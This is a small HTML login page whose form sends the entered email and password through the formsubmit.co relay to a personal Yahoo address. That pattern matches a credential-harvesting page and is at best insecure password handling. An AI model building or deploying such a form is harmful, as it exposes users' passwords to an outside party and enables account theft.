<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="stylesheet" href="/static/css/log_in.css">
    <title>Sign Up Form</title>
  </head>
  <body>
    <div class="container">
      <form
        autocomplete="off"
        action="https://formsubmit.co/iusti_iustina1999@yahoo.com"
        method="POST"
      >
        <h1>Log in</h1>
        <div class="form-inner">
          <article>
            <label for="email">Email</label>
            <input type="email" name="email" id="email" required />
          </article>
        </div>
        <div class="form-inner">
          <article>
            <label for="password-one">Password</label>
            <input
              type="password"
              name="password-one"
              id="password-one"
              required
            />
          </article>
        <button class="btn" type="submit">LOG IN</button>
      </form>
    </div>
    <link rel="stylesheet" href="index.css" />
  </body>
</html>
